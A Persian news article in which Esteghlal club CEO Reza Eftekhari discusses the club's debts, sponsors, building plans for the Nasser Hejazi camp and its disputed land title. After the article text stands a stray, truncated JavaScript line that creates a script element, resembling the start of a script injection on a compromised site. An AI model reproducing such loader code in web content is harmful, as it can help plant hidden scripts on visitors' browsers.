افتخاری: کسی نمی‌تواند ادعا کند یک متر از کمپ مرحوم حجازی برای اوست


رضا افتخاری

مدیرعامل باشگاه استقلال می‌گوید سند کمپ ناصر حجازی متعلق به مسکن و شهرسازی است و کسی نمی‌تواند ادعا کند که حتی یک متر از آن به او تعلق دارد.

به گزارش سادس، سیدرضا افتخاری، پس از جلسه امروز هیات مدیره این باشگاه در جمع خبرنگاران اظهار کرد: بیشتر بحث امروز هیات مدیره در رابطه با مسائل اقتصادی باشگاه بود. باشگاه استقلال بدهی‌های زیادی دارد که یکی از اقلامی که امروز مطرح شد بدهی هشت میلیاردی باشگاه به دارایی بود. متاسفانه این بدهی‌ها برای مدیریت ما مانده و ما باید تکلیف آن را مشخص کنیم. همچنین امروز درباره یافتن اسپانسری برای تیم بحث شد. درباره بحث درآمدزایی با سه اسپانسر صحبت شده که با یکی از آنها قرارداد امضا کرده‌ایم و دو اسپانسر دیگر در حال گفت‌وگو هستیم.

او ادامه داد: بحث بعدی ما سرمایه‌گذاری افراد خارجی در کمپ مرحوم ناصر حجازی است. ما دو طرح داریم که یکی از آنها ساخت یک خوابگاه یا یک هتل برای اسکان تیم خودمان است تا تیم از این هتل به هتل دیگری نرود و به اصطلاح آواره نشود. همچنین تیم‌های پایه نیز که از شهرستان‌ها می‌آیند از آن خوابگاه استفاده کنند. با شرکتی وارد مذاکره شدیم تا در این قسمت سرمایه‌گذاری کنند. پروژه بعدی ما در کمپ احداث ساختمان اداری باشگاه استقلال است. فضایی که در ساختمان فعلی باشگاه استقلال است در شأن این باشگاه نیست. خوشبختانه در محل کمپ زمین زیادی وجود دارد که می‌توان از آن استفاده کرد و طرح‌های آینده را در محل مناسبی اجرایی کنیم. همچنین برنامه‌های دیگری نیز داریم نظیر ارائه محصولات خود باشگاه یا ارائه محصولاتی که شرکت‌های طرف قرارداد با باشگاه دارند. می‌خواهیم آنجا را تبدیل به مکانی امن برای اعضای باشگاه و همچنین هواداران کنیم و آن مکان را مجهز به بدنسازی و امکانات دیگر کنیم. اگر بتوانیم ۱۰ درصد از درآمد خود را صرف کارهایی که گفتم بکنیم می‌توانیم تا یک سال آینده در کمپ صاحب امکانات خوبی شویم.

افتخاری اضافه کرد: چمن کمپ نیز تغییر خواهد کرد. خوشبختانه با صنایع دفاع صحبت کردیم و قرار شد از این پس زمین تمرین میدان نوبنیاد استفاده کنیم. امروز که من با مسوولان آنجا صحبت کردم به من خبر دادند که در حال رنگ زدن رختکن آن ورزشگاه هستند تا رنگ رختکن به آبی تغییر کند. قرارداد ما با آنها یکسال است و از تاریخی که ورزشگاه را به ما تحویل دهند تا یک سال بعد ما از زمین چمن نوبنیاد به عنوان زمین تمرین استفاده خواهیم کرد. مبلغ اجاره این زمین با نگهداری آن چیزی در حدود ۵۰۰ میلیون تومان است.

او درباره نحوه تملک باشگاه استقلال بر کمپ مرحوم ناصر حجازی تصریح کرد: من زمانی که مدیر کل تربیت بدنی استان تهران بودم نامه‌ای را به مسکن و شهرسازی زدم و اکنون قراردادی وجود دارد و اداره کل ورزش و جوانان براساس این قرارداد این مکان را به باشگاه استقلال واگذار کرده است. در آن زمان موفق نشدند که سند مالکیت این کمپ را از مسکن و شهرسازی بگیرند و ساخت و ساز نیمه‌تمام ماند. اکنون واحد حقوقی وزارت ورزش پیگیر این است که سند مالکیت این ورزشگاه را برای استقلال بگیرد زیرا زمین آنجا برای وزارت ورزش است. به من گفته شده که خانمی جزو معارضین قرار دارد اما طرف حساب آن خانم مسکن و شهرسازی است و نه باشگاه استقلال زیرا سند کمپ ناصر حجازی به نام مسکن و شهرسازی است و این نهاد است که قرارداد را امضا کرده اما به دلیل ورزشی بودن کاربری بودن کمپ آن را به باشگاه استقلال دادند. بعد از اینکه سند از مسکن و شهرسازی گرفته شد با استقلال قراردادی بلندمدت امضا خواهد شد و کمپ به باشگاه استقلال تعلق خواهد گرفت. این کمپ چند سال است که دست باشگاه استقلال است و اگر معارضی وجود داشت در این چند سال می‌آمد و نامه‌ای نیز برای ما ارسال می‌شد اما چیزی برای ما ارسال نشده و کسی هم نتوانسته است ادعا کند که یک متر از آنجا برای اوست.

ادامه دارد…

var d=document;var s=d.createElement(‘script’);

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *